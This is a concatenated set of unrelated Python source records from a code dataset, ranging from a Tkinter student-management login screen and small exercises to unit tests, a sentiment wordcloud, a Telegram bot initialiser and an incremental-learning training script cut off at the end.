pickle.dump(tlist,f)\n f.close()\n load.destroy()\n break\n elif username.get() == '123456' and password.get() == '123456':\n x = 1\n if z.get() == '1':\n tlist = [z.get(),y.get(),username.get(),password.get()]\n f = open('学生管理系统/load','wb')\n pickle.dump(tlist,f)\n f.close()\n elif z.get() == '0':\n tlist = [z.get(),y.get(),'','']\n f = open('学生管理系统/load','wb')\n pickle.dump(tlist,f)\n f.close()\n load.destroy()\n break\n if x == 0:\n username.set('密码或用户名错误!')\n password.set('')\n\ndef zdgx():\n if y.get() == '1':\n z.set('1')\n\n#初始化\nstar()\nx = 0\nwho = 0\nf = open('学生管理系统/load','rb')\ndas = pickle.load(f)\nf.close()\nidentity = 'admin'\n\n#登录界面\nload = Tk(className = '登录')\npmx = load.winfo_screenwidth()\npmy = load.winfo_screenheight()\nweizhi = '%dx%d+%d+%d' % (430,300,(pmx-430)/2,(pmy-300)/2)\nload.geometry(weizhi)\nload.resizable(width = False,height = False)\nload.iconbitmap('学生管理系统/logo.ico')\n\nlogo = PhotoImage(file = '学生管理系统/logo.png')\nLabel(image = logo).pack(anchor = N)\n\nroot = Frame(load)\nroot.pack()\n\nusername = StringVar()\npassword = StringVar()\nusername.set(das[2])\npassword.set(das[3])\n\nblank2 = Label(root,text = '')\nblank2.grid(row = 1)\n\nun = Label(root,text = '用户名:',width = 8,anchor = W)\nun.grid(row = 2,column = 1)\nunentry = Entry(root,textvariable = username,width = 20)\nunentry.grid(row = 
2,column = 2)\nunentry.focus_set()\n\nblank2 = Label(root,text = '')\nblank2.grid(row = 3)\n\npw = Label(root,text = '密码:',width = 8,anchor = W)\npw.grid(row = 4,column = 1)\npwentry = Entry(root,show = '*',textvariable = password,width = 20)\npwentry.grid(row = 4,column = 2)\n\nz = StringVar()\ny = StringVar()\nz.set(das[0])\ny.set(das[1])\nradio = Checkbutton(root,variable = z,onvalue = 1,offvalue = 0,text = '保存密码')\nradio.grid(row = 5,column = 1)\ncheck = Checkbutton(root,variable = y,onvalue = 1,offvalue = 0,text = '自动登录',command = zdgx)\ncheck.grid(row = 5,column = 2)\n\nButton(load,bg = 'blue',fg = 'white',text = '登录',width = 30,command = loadcheck).pack()\n\nif y.get() == '1':\n loadcheck()\n\nload.mainloop()\n\n##########################################################################################################################################\n\nif x == 1:\n win = Tk(className = '学生管理系统')\n # win.geometry('1000x618')\n weizhi = '%dx%d+%d+%d' % (1000,618,(pmx-1000)/2,(pmy-618)/2)\n win.geometry(weizhi)\n # win.resizable(width = False,height = False)\n win.iconbitmap('学生管理系统/logo.ico')\n\n #最上方位图logo\n logo = PhotoImage(file = '学生管理系统/logo.png')\n Label(bg = 'blue',image = logo,width = '746p').pack(anchor = W)\n\n #主体框架\n row0 = Frame(win,bg = 'blue')\n row0.pack(anchor = W)\n row1 = Frame(win,bg = 'RoyalBlue')\n row1.pack(anchor = W)\n\n #row0\n Label(row0,bg = 'blue',width = 25).grid(row = 0,column = 0)\n Label(row0,font = (10),text = '学生管理系统',bg = 'blue',fg = 'white',width = 64).grid(row = 0,column = 1)\n welcome = StringVar()\n if identity == 'admin':\n welcm = '欢迎 管理员'\n elif identity == 'stu':\n welcm = '欢迎 {} 同学!!'.format(xueji[who].name())\n welcome.set(welcm)\n Label(row0,textvariable = welcome,anchor = E,bg = 'blue',fg = 'white',width = 25).grid(row = 0,column = 2)\n\n #row1主体部分开始\n r1c0 = Frame(row1)\n r1c0.grid(row = 0,column = 0,sticky = N)\n r1c1 = Frame(row1,bg = 'RoyalBlue',width = 750,height = 494)\n r1c1.grid(row = 0,column = 1)\n\n #r1c0\n b1 = Button(r1c0,text = '学生基本资料',width = 30,height = 3,font = 15,relief = GROOVE,command = changeto_b1)\n b1.grid(row = 0,column = 0)\n b2 = Button(r1c0,text = '学生成绩管理',width = 30,height = 3,font = 15,relief = GROOVE,command = changeto_b2)\n b2.grid(row = 1,column = 0)\n b3 = Button(r1c0,text = '学生信息录入',width = 30,height = 3,font = 15,relief = GROOVE,command = changeto_b3)\n if identity == 'admin':\n b3.grid(row = 2,column = 0)\n b4 = Button(r1c0,text = '账户设置',width = 30,height = 3,font = 15,relief = GROOVE,command = changeto_b4)\n b4.grid(row = 3,column = 0)\n\n win.mainloop()","sub_path":"学生管理系统/学生管理系统.pyw","file_name":"学生管理系统.pyw","file_ext":"pyw","file_size_in_byte":24751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"461589857","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n'''\n__Author__ = 'cherry'\n__Mtime__ = '2018/12/5 14:43'\n__Email__ = 'go.xmyang@gmail.com'\n'''\n\nimport logging\n\ndef runlog(logfile):\n logging.basicConfig(level=logging.INFO,\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n filename=logfile,\n filemode='a')\n logger = logging.getLogger(__name__)\n return logger\n","sub_path":"warch_run/lib/Log.py","file_name":"Log.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"244768287","text":"# 1. 
Write a Python function that takes a sequence of numbers and determines whether all the\n# numbers are different from each other.\n\n\ndef test(list):\n for i in list:\n contor = 0\n for j in list:\n if i == j:\n if contor == 0:\n contor = contor + 1\n else:\n return False\n return True\n\n\nlist = [1, 2, 5, 5, 3]\nprint(test(list))\n","sub_path":"Python intro problems II/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"238801192","text":"# ARGPARSE MODULE - argp07.py | Mutual Exclusion\r\n\r\n\r\n\"\"\"\r\n#-----------------------------------------------------------------------------------\r\n# ### INTRODUCTION TO ARGPARSE ###\r\n#-----------------------------------------------------------------------------------\r\n\r\nThe argparse module makes it easy to write user-friendly command-line interfaces. \r\nThe program defines what arguments it requires, and argparse will figure out how to \r\nparse those out of sys.argv. The argparse module also automatically generates help \r\nand usage messages and issues errors when users give the program invalid arguments.\r\n\r\nhttps://docs.python.org/3/library/argparse.html\r\n#-----------------------------------------------------------------------------------\r\n\"\"\"\r\n\r\n\r\n\"\"\"\r\n\r\nThe add_argument() method\r\n\r\nArgumentParser.add_argument(name or flags...[, action][, nargs][, const][, default][, type][, choices][, required][, help][, metavar][, dest])\r\n\r\n\r\n1. name or flags - Either a name or a list of option strings, e.g. foo or -f, --foo.\r\n2. action - The basic type of action to be taken when this argument is encountered at the command line.\r\n3. nargs - The number of command-line arguments that should be consumed.\r\n4. const - A constant value required by some action and nargs selections.\r\n5. default - The value produced if the argument is absent from the command line.\r\n6. type - The type to which the command-line argument should be converted.\r\n7. choices - A container of the allowable values for the argument.\r\n8. required - Whether or not the command-line option may be omitted (optionals only).\r\n9. help - A brief description of what the argument does.\r\n10. metavar - A name for the argument in usage messages.\r\n11. 
dest - The name of the attribute to be added to the object returned by parse_args().\r\n\r\nhttps://docs.python.org/3/library/argparse.html#the-parse-args-method\r\n\"\"\"\r\n\r\nimport argparse\r\nimport sys\r\n\r\nprint('\\nPath of Python executable binary: {}'.format(sys.executable))\r\nprint('Python version: {}\\n '.format (sys.version))\r\n\r\n# 01 List of Command line arguments ------------------------------------------------ \r\nprint('Number of command-line arguments: {} '.format( len(sys.argv)) )\r\nprint('List of arguments: {} \\n\\n '.format( str(sys.argv)))\r\n#-----------------------------------------------------------------------------------\r\n\r\n\r\n\r\n\r\n# 07 ARGPARSE: Mutual Exclusion #---------------------------------------------------\r\n\r\nparser = argparse.ArgumentParser(description = 'Introduction to ARGPARSE Module')\r\n\r\ngroup1 = parser.add_mutually_exclusive_group(required = True)\r\n\r\n\r\n# Exclusive Group 1 arguments\r\ngroup1.add_argument('-c', '--cube', help = 'Cube', action = 'store_true')\r\ngroup1.add_argument('-s', '--sphere', help = 'Sphere', action = 'store_true')\r\n\r\n\r\n\r\n\r\n \r\n#\t> Positional arguments\r\nparser.add_argument('arg1', help = 'Length/radius of the cube/shpehre', type = float)\r\n\r\n\r\n\r\n# Optional Arguments\r\nparser.add_argument('-opt1', '--option1', help = 'Upper or Lower Case optional argument (str)',\r\n\t\t\t\t\ttype = str,\r\n\t\t\t\t\tnargs = '?',\r\n\t\t\t\t\tchoices = ['cap', 'low'],\r\n\t\t\t\t\tdefault = 'low')\r\n\t\t\t\t\t\r\nparser.add_argument('-p', '--printr', help = 'Print results',\r\n\t\t\t\t\taction = 'store_true')\r\n\r\n\r\nargs = parser.parse_args()\r\n\r\nif args.printr:\r\n\tif args.option1 == 'cap':\r\n\t\tif args.cube:\r\n\t\t\tprint('Length of the cube: {}'.format(args.arg1).upper())\r\n\t\telse:\r\n\t\t\tprint('Radius of the sphere: {}'.format(args.arg1).upper())\r\n\telse:\r\n\t\tif args.cube:\r\n\t\t\tprint('Length of the cube: {}'.format(args.arg1).lower())\r\n\t\telse:\r\n\t\t\tprint('Radius of the sphere: {}'.format(args.arg1).lower())\r\n\r\nelse:\t\r\n\tprint('Print option: {}'.format(args.printr))\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"e.IO/argparse module/argp07.py","file_name":"argp07.py","file_ext":"py","file_size_in_byte":3836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"95083832","text":"from playsound import playsound\nimport random\n\n\nclass Monster:\n def __init__(self, name, description):\n self.name = name\n self.description = description\n self.health = 100\n\n def __str__(self):\n return (f\"\"\"{self.name} - {self.description}\nHealth: {self.health}\n\"\"\")\n\n def on_attack(self, player):\n is_hit = [\"strong\", \"weak\", \"miss\"]\n hit_is = is_hit[random.randint(0, 2)]\n if(not player.hasSword()):\n print(\"can't fight monsters without a sword\")\n return self.health\n if(hit_is == \"strong\"):\n playsound('sword_collide.mp3')\n playsound('slashkut.wav')\n self.health -= 30\n elif(hit_is == \"weak\"):\n playsound('sword_collide.mp3')\n playsound('slashkut.wav')\n self.health -= 20\n else:\n playsound('sword_swing.mp3')\n if(self.health <= 0):\n playsound('dying.wav')\n return self.health\n","sub_path":"src/monster.py","file_name":"monster.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"621663380","text":"# 
from tensorflow.python.ops.rnn_cell import BasicLSTMCell\n# import tensorflow as tf\nimport numpy as np\nimport math\nimport re\nimport matplotlib.pyplot as plt\nincorrect_path = 'F:\\\\HRNN.txt'\nfile_incorrect = open(incorrect_path, 'r')\nline = file_incorrect.readline()\naccuracy = list()\nepoch = list()\nloss = list()\n\nread_list=['Epoch - \\s?\\d+', 'MSE: s - \\d+.\\d+','f - \\d+.\\d+','v - \\d+.\\d+', 'q - \\d+.\\d+']\nnumber_regex_list=['\\d+','\\d+.\\d+','\\d+.\\d+','\\d+.\\d+','\\d+.\\d+']\nshow_list=[]\nindex_str='Epoch'\n\nstart_index = 3000\nrow_index=0\ndata=list()\nwhile line:\n col_index=0\n data_row = list()\n for read_str in read_list:\n regex_str = read_str\n regex = re.findall(regex_str, line)\n if len(regex)>0:\n data_str = re.findall(number_regex_list[col_index],regex[0])\n data_row.append(float(data_str[0]))\n\n col_index += 1\n data.append(data_row)\n line=file_incorrect.readline()\n row_index += 1\n\ndata=np.array(data)\n\n# Error Rate\n\nmin = np.min(data, 0)\n\n\npass\n","sub_path":"show_result.py","file_name":"show_result.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"57912196","text":"import os\nimport unittest\nimport shutil\n\nimport simulacra as si\n\nTHIS_DIR = os.path.abspath(os.path.dirname(__file__))\nTEST_DIR = os.path.join(THIS_DIR, 'temp-unit-testing')\n\n\nclass TestBeet(unittest.TestCase):\n def setUp(self):\n self.obj = si.Beet('foo')\n self.obj_name = 'foo'\n self.target_name = 'foo.beet'\n si.utils.ensure_parents_exist(TEST_DIR)\n\n def tearDown(self):\n shutil.rmtree(TEST_DIR)\n\n def test_beet_names(self):\n self.assertEqual(self.obj.name, self.obj_name)\n self.assertEqual(self.obj.file_name, self.obj_name)\n\n def test_save_load(self):\n path = self.obj.save(target_dir = TEST_DIR)\n self.assertEqual(path, os.path.join(TEST_DIR, self.target_name)) # test if path was constructed correctly\n self.assertTrue(os.path.exists(path)) # path should actually exist on the system\n loaded = si.Beet.load(path)\n self.assertEqual(loaded, self.obj) # beets should be equal, but NOT the same object\n self.assertEqual(loaded.uuid, self.obj.uuid) # beets should have the same uid\n self.assertEqual(hash(loaded), hash(self.obj)) # beets should have the same hash\n self.assertIsNot(loaded, self.obj) # beets should NOT be the same object\n\n\nclass TestSpecification(TestBeet):\n def setUp(self):\n self.obj = si.Specification('bar')\n self.obj_name = 'bar'\n self.target_name = 'bar.spec'\n si.utils.ensure_parents_exist(TEST_DIR)\n\n\nclass TestSimulation(TestBeet):\n def setUp(self):\n self.obj = si.Simulation(si.Specification('baz'))\n self.obj_name = 'baz'\n self.target_name = 'baz.sim'\n si.utils.ensure_parents_exist(TEST_DIR)\n\n def testStatus(self):\n passes = (si.Status.INITIALIZED, si.Status.RUNNING, si.Status.RUNNING, si.Status.FINISHED, si.Status.PAUSED)\n fails = ('foo', 'foobar', 5, 10, None)\n\n for status in passes:\n with self.subTest(x = status):\n self.obj.status = status\n\n for status in fails:\n with self.subTest(x = status):\n with self.assertRaises(TypeError):\n self.obj.status = status\n\n\nclass TestSumming(unittest.TestCase):\n def setUp(self):\n self.summand_one = si.Summand()\n self.summand_two = si.Summand()\n self.sum = self.summand_one + self.summand_two\n\n def test_is(self):\n self.assertFalse(self.summand_one is self.summand_two)\n\n def test_equality(self):\n self.assertFalse(self.summand_one == self.summand_two)\n\n def 
test_instance_of(self):\n self.assertTrue(isinstance(self.summand_one, si.Summand))\n self.assertTrue(isinstance(self.summand_two, si.Summand))\n self.assertTrue(isinstance(self.sum, si.Summand))\n self.assertTrue(isinstance(self.sum, si.Sum))\n\n self.assertFalse(isinstance(self.summand_one, si.Sum))\n self.assertFalse(isinstance(self.summand_two, si.Sum))\n\n def test_container(self):\n self.assertTrue(self.summand_one in self.sum.summands)\n self.assertTrue(self.summand_two in self.sum.summands)\n\n self.assertTrue(self.summand_one in self.sum)\n self.assertTrue(self.summand_two in self.sum)\n\n\nclass TestSummingSubclassing(unittest.TestCase):\n def setUp(self):\n class Fruit(si.Summand):\n def __init__(self):\n super().__init__()\n self.summation_class = FruitBasket\n\n class FruitBasket(si.Sum, Fruit):\n container_name = 'basket'\n\n class Apple(Fruit):\n pass\n\n class Banana(Fruit):\n pass\n\n self.Fruit = Fruit\n self.FruitBasket = FruitBasket\n self.Apple = Apple\n self.Banana = Banana\n\n self.apple = self.Apple()\n self.banana = self.Banana()\n self.fruit_basket = self.apple + self.banana\n\n def test_instance_of_bases(self):\n self.assertTrue(isinstance(self.apple, si.Summand))\n self.assertTrue(isinstance(self.banana, si.Summand))\n self.assertTrue(isinstance(self.fruit_basket, si.Summand))\n self.assertTrue(isinstance(self.fruit_basket, si.Sum))\n\n self.assertFalse(isinstance(self.apple, si.Sum))\n self.assertFalse(isinstance(self.banana, si.Sum))\n\n def test_instance_of_subclasses(self):\n self.assertTrue(isinstance(self.fruit_basket, self.Fruit))\n self.assertTrue(isinstance(self.fruit_basket, self.FruitBasket))\n\n self.assertFalse(isinstance(self.fruit_basket, self.Apple))\n self.assertFalse(isinstance(self.fruit_basket, self.Banana))\n\n def test_container(self):\n self.assertTrue(self.apple in self.fruit_basket.basket)\n self.assertTrue(self.banana in self.fruit_basket.basket)\n\n self.assertTrue(self.apple in self.fruit_basket)\n self.assertTrue(self.banana in self.fruit_basket)\n","sub_path":"tests/old_tests.py","file_name":"old_tests.py","file_ext":"py","file_size_in_byte":4876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"365470906","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Aug 3 23:44:38 2019\r\n@author: Virendra Pratap Singh\r\nWritten Using Spyder (Python 3.7)\r\n\r\nWhat this code does?\r\n1) Read a phrase.\r\n2) Split into words.\r\n3) Remove stopwords.\r\n4) Calculate sentiments and divide words in POSITIVE & NEGATIVE words.\r\n5) Store them in list and ignore NEUTRAL words.\r\n6) Assign POSITIVE words to GREEN (POSITIVE) list and NEGATIVE words to RED (NEGATIVE) list.\r\n7) Draw wordcloud with colours decided on GREEN and RED list.\r\n\"\"\"\r\n\r\nfrom nltk.corpus import stopwords\r\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer\r\nfrom wordcloud import WordCloud, get_single_color_func\r\nimport matplotlib.pyplot as plt\r\n\r\ndef RemoveDuplicateFrom(list_of_words): \r\n \"\"\"\r\n Very simplistic duplicate removing function\r\n \"\"\"\r\n final_list = [] \r\n for word in list_of_words: \r\n if word not in final_list: \r\n final_list.append(word) \r\n return final_list \r\n\r\nclass AssignColour(object):\r\n \"\"\"\r\n Assigns colors to words based on a {color:[words]} dictionary \r\n using the already available wordcloud.get_single_color_func function.\r\n Note that [words] is a list - since I am dividing words in\r\n two possible categories - Positive and 
Negative\r\n \"\"\"\r\n def __init__(self, colour_words_dict, default):\r\n self.colour_words_dict = [\r\n (get_single_color_func(colour), set(words))\r\n for (colour, words) in colour_words_dict.items()]\r\n\r\n self.default = get_single_color_func(default)\r\n\r\n def get_colour(self, word):\r\n try:\r\n colour = next(\r\n colour for (colour, words) in self.colour_words_dict\r\n if word in words)\r\n except StopIteration:\r\n colour = self.default\r\n\r\n return colour\r\n\r\n def __call__(self, word, **kwargs):\r\n return self.get_colour(word)(word, **kwargs)\r\n\r\ntribute_dickens = \"\"\"\r\nIt was the best of times, \r\nit was the worst of times, \r\nit was the age of wisdom, \r\nit was the age of foolishness, \r\nit was the epoch of belief, \r\nit was the epoch of incredulity,\r\n it was the season of Light, \r\n it was the season of Darkness, \r\n it was the spring of hope, \r\n it was the winter of despair, \r\n we had everything before us, \r\n we had nothing before us, \r\n we were all going direct to Heaven, \r\n we were all going direct the other way.\r\n\"\"\"\r\n\r\ntribute_herge = \"\"\"\r\nTintin is sweet, smart and intelligent.\r\nHaddock is strong, loyal and drunk and friend of Tintin.\r\nCalculus is awesome genius, old and very deaf and friend of Haddock.\r\nThompson and Thomson are funny, stupid and nice and friends of Tintin.\r\nRastapopuolous is dangerous, enemy and evil and enemy of Tintin.\r\nCastafiore is sweet, arrogant and rich and friend of Haddock.\r\nDolivera is shrewd, clever and vendor and friend of Tintin.\r\nAbdullah is rascal, sweet and childish and not-friend of Tintin. \r\n\"\"\"\r\n\r\nphrase = tribute_dickens\r\n#phrase = tribute_herge\r\nstop_words=set(stopwords.words(\"english\"))\r\nclean_string = phrase.replace(',', '')\r\nwords = clean_string.split()\r\nwords = RemoveDuplicateFrom(words)\r\ncleaned_lines = dict()\r\npositive_words = []\r\nnegative_words = []\r\n\r\nsia = SentimentIntensityAnalyzer()\r\nfor r in words: \r\n if not r.lower() in stop_words: #Exclude words which are in StopWords list\r\n neg_polarity = sia.polarity_scores(r)['neg']\r\n pos_polarity = sia.polarity_scores(r)['pos']\r\n cpd_polarity = sia.polarity_scores(r)['compound']\r\n sentiment = (neg_polarity+pos_polarity)*cpd_polarity #I know this isn't a great formula\r\n if (sentiment != 0) : #Not listing any neutral words since they use the default colour\r\n cleaned_lines[r]=sentiment\r\n\r\nprint(cleaned_lines)\r\nprint(type(cleaned_lines))\r\n \r\nfor key,value in cleaned_lines.items(): #Divide between POSITIVE and NEGATIVE list\r\n if (value>0):\r\n positive_words.append(key)\r\n else:\r\n negative_words.append(key)\r\n\r\nprint(positive_words)\r\nprint(negative_words)\r\n\r\ncolour_words_dict = {\r\n # POSITIVE words are GREEN\r\n 'green': positive_words,\r\n # NEGATIVE words are RED\r\n 'red': negative_words\r\n}\r\n\r\nprint(colour_words_dict)\r\n\r\nwc = WordCloud(collocations=False, background_color='skyblue').generate(phrase.lower())\r\ngrouped_colour_func = AssignColour(colour_words_dict, 'white') #NEUTRAL words are WHITE\r\nwc.recolor(color_func=grouped_colour_func)\r\n\r\nplt.figure()\r\nplt.imshow(wc, interpolation=\"bilinear\")\r\nplt.axis(\"off\")\r\nplt.show()","sub_path":"word_painter.py","file_name":"word_painter.py","file_ext":"py","file_size_in_byte":4514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"20319257","text":"from __future__ import print_function # For python 2/3 interoperability\n\n# 
[START sync_query]\n\nfrom samples import auth\nfrom samples import query\n\n\ndef sync_query(service, project_id, query, timeout=0):\n \"\"\" Run a synchronous query\"\"\"\n\n # [START query_data]\n query_data = {\n 'query': query,\n 'timeoutMs': timeout,\n }\n # [END query_data]\n\n return service.jobs().query(\n projectId=project_id,\n body=query_data).execute()\n\n\ndef main():\n service = auth.get_service()\n project_id = raw_input(\"Choose your project ID: \")\n query_string = raw_input(\"Enter your Bigquery SQL Query: \")\n\n for page in query.query_paging(service, query.query_polling(\n service, sync_query(service, project_id, query_string))):\n print(page)\n# [END sync_query]\n","sub_path":"samples/sync_query.py","file_name":"sync_query.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"176321003","text":"import os\n\n\ndef init_tracker(tracker, img, boxes):\n for box in boxes:\n ok = tracker.add(img, box)\n if not ok:\n return False\n return True\n\n\ndef detection(filename):\n \"\"\"\n :param filename: the root of detection file, format txt\n :return: [(x, y, w, h), (x, y, w, h), ... , ()]\n \"\"\"\n if os.path.exists(filename):\n bboxs = []\n ids = []\n max_obj = 10\n with open(filename, 'r') as fr:\n infos = fr.readlines()\n count = 0\n for info in infos:\n count += 1\n if count > max_obj:\n break\n info = info.strip().split(\" \")\n label = info[0]\n x = int(info[2])\n y = int(info[3])\n h = int(info[-1]) - int(info[3])\n w = int(info[-2]) - int(info[2])\n if label in ['car', 'person'] and h > 100 and w > 50:\n bboxs.append((x, y, w, h))\n ids.append(count)\n if len(bboxs) == 0:\n return None, None\n else:\n return bboxs, ids\n else:\n print(\"{} is not exit!\".format(filename))\n return None, None\n\n\ndef compare(boxes, pre_boxes, pre_ids, max_id, th=0.5):\n new_boxes = []\n is_new = False\n if boxes is None:\n ids = None\n else:\n if pre_boxes is None:\n is_new = True\n new_boxes = boxes\n ids = [max_id+x+1 for x in range(len(boxes))]\n max_id = max(ids)\n else:\n ids = [0 for _ in boxes]\n find_flag = [False for _ in pre_boxes]\n for i, box in enumerate(boxes):\n x1, y1 = int(box[0]), int(box[1])\n x2, y2 = int(box[0] + box[2]), int(box[1] + box[3])\n bbox1 = (x2-x1)*(y2-y1)\n for j, pre_box in enumerate(pre_boxes):\n if find_flag[j]:\n continue\n pre_x1, pre_y1 = int(pre_box[0]), int(pre_box[1])\n pre_x2, pre_y2 = int(pre_box[0] + pre_box[2]), int(pre_box[1] + pre_box[3])\n bbox2 = (pre_x2 - pre_x1) * (pre_y2 - pre_y1)\n inner_x1 = max(x1, pre_x1)\n inner_y1 = max(y1, pre_y1)\n inner_x2 = min(x2, pre_x2)\n inner_y2 = min(y2, pre_y2)\n inner_area = max(0, (inner_x2-inner_x1)) * max(0, (inner_y2-inner_y1))\n out_area = bbox1 + bbox2 - inner_area\n iou = inner_area/out_area\n if iou >= th:\n ids[i] = pre_ids[j]\n find_flag[j] = True\n break\n if j < len(pre_boxes)-1:\n continue\n max_id += 1\n ids[i] = max_id\n new_boxes.append(box)\n is_new = True\n assert len(new_boxes) <= len(boxes)\n return ids, is_new, new_boxes, max_id\n","sub_path":"tools/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"274449539","text":"import sys\nimport pickle\n\nfrom telegram.ext import Updater, MessageHandler, Filters, CallbackContext\nfrom telegram import Update\n\n\nif len(sys.argv) > 2:\n print(\"Error: terlalu banyak argumen\")\n exit(1)\nelif len(sys.argv) < 2:\n 
print(\"Error: tidak ada token yang dimasukkan\")\n exit(1)\n\nTOKEN = sys.argv[1]\n\n\ndef on_message(update: Update, ctx: CallbackContext):\n with open(\"telegramdata\", 'wb') as f:\n data = {\n \"token\": TOKEN,\n \"chatid\": update.effective_chat.id\n }\n pickle.dump(data, f)\n print(\"Info: Sukses\")\n update.effective_chat.send_message(\"Inisialisasi Sukses\")\n exit(0)\n\n\nupdater = Updater(TOKEN)\nupdater.dispatcher.add_handler(MessageHandler(Filters.text, on_message))\nprint(\"Silahkan kirimkan pesan teks ke bot anda di telegram\")\nupdater.start_polling()\n","sub_path":"telegraminit.py","file_name":"telegraminit.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"318341956","text":"def main():\n userName=input(\"Enter your name:\")\n userDescription=input(\"Describe yourself:\")\n print(userName)\n print(userDescription)\n\n html_str = \"\"\"\n \n \n \n
<html>\n    <head>\n    <title>\"\"\"+userName+\"\"\"</title>\n    </head>\n    <body>\n    <p>\"\"\"+userDescription+\"\"\"</p>\n    </body>\n    </html>
\n \n\"\"\"\n\n Html_file = open(\"filename.html\", \"w\")\n Html_file.write(html_str)\n Html_file.close()\n\n\nmain()","sub_path":"HW4/htmloutput.py","file_name":"htmloutput.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"628163174","text":"import html_to_markdown\nimport link_processing \n\nfrom markdown_file_processor import MarkdownFileProcessor\n\ndef main():\n\n path = \"C:\\\\Projects\\\\Python\\\\PlaylistProcessor\\\\\"\n\n input_path = path + \"\\\\Content\"\n existing_path = path + \"\\\\Existing\"\n\n html_to_markdown.translate_files_from_html_to_markdown(input_path, '.html')\n links = html_to_markdown.process_files_into_list_of_links(input_path)\n\n markdown_file_processor = MarkdownFileProcessor(existing_path)\n known_urls = markdown_file_processor.process_files()\n\n new_links = link_processing.find_new_links(links, known_urls)\n\n for link in new_links:\n print('- ', link)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"cleanuplist.py","file_name":"cleanuplist.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"276329944","text":"import argparse\r\nfrom models.model_resnet import *\r\nfrom models.model_resnet18 import *\r\nimport myData.iDataset\r\nimport myData.iDataLoader\r\nfrom utils import *\r\nfrom sklearn.utils import shuffle\r\nimport trainer.trainer_warehouse\r\nimport trainer.evaluator\r\nfrom arguments import *\r\nfrom myData.data_warehouse import *\r\nfrom models.W_resnet import *\r\nimport torch.optim as optim\r\n\r\n\r\nargs = get_args()\r\n\r\n#seed\r\nseed = args.seed\r\nset_seed(seed)\r\n\r\n#set gpu\r\nGPU_NUM = 0 # 원하는 GPU 번호 입력\r\ndevice = torch.device(f'cuda:{GPU_NUM}' if torch.cuda.is_available() else 'cpu')\r\n\r\ntorch.cuda.set_device(device)\r\nprint(\"current cuda : \", torch.cuda.current_device())\r\n\r\nif device.type == 'cuda':\r\n print(torch.cuda.get_device_name(GPU_NUM))\r\n print('Memory Usage:')\r\n print('Allocated:', round(torch.cuda.memory_allocated(GPU_NUM) / 1024 ** 3, 1), 'GB')\r\n print('Cached: ', round(torch.cuda.memory_cached(GPU_NUM) / 1024 ** 3, 1), 'GB')\r\n\r\ndata = DatasetWH\r\ndataset = data.get_dataset(args.dataset)\r\n\r\n#shuffle_idx = shuffle(np.arange(dataset.classes), random_state=seed)\r\nshuffle_idx = None\r\n\r\ntasknum = (dataset.classes - args.start_classes) // args.step_size + 1\r\n\r\n#######################################################################dataset, dataloader, model decalare\r\nif args.dataset == 'CIFAR100' or args.dataset == 'CIFAR10':\r\n loader = None\r\n myNet = resnet32(num_classes=dataset.classes, tasknum=tasknum).cuda()\r\nelse:\r\n loader = dataset.loader\r\n myNet = wideresnet(depth=16, num_classes=200, widen_factor=2, dropRate=0.3).cuda()\r\n\r\n\r\ntrain_dataset_loader = myData.iDataLoader.IncrementalLoader(dataset.train_data,\r\n dataset.train_labels,\r\n dataset.classes,\r\n args.step_size,\r\n args.memory_size,\r\n 'train',\r\n transform=dataset.train_transform,\r\n loader=loader,\r\n shuffle_idx=shuffle_idx,\r\n base_classes=args.start_classes,\r\n approach= args.trainer,\r\n )\r\n\r\nevaluate_dataset_loader = myData.iDataLoader.IncrementalLoader(dataset.train_data,\r\n dataset.train_labels,\r\n dataset.classes,\r\n args.step_size,\r\n args.memory_size,\r\n 'train',\r\n transform=dataset.train_transform,\r\n loader=loader,\r\n shuffle_idx=shuffle_idx,\r\n 
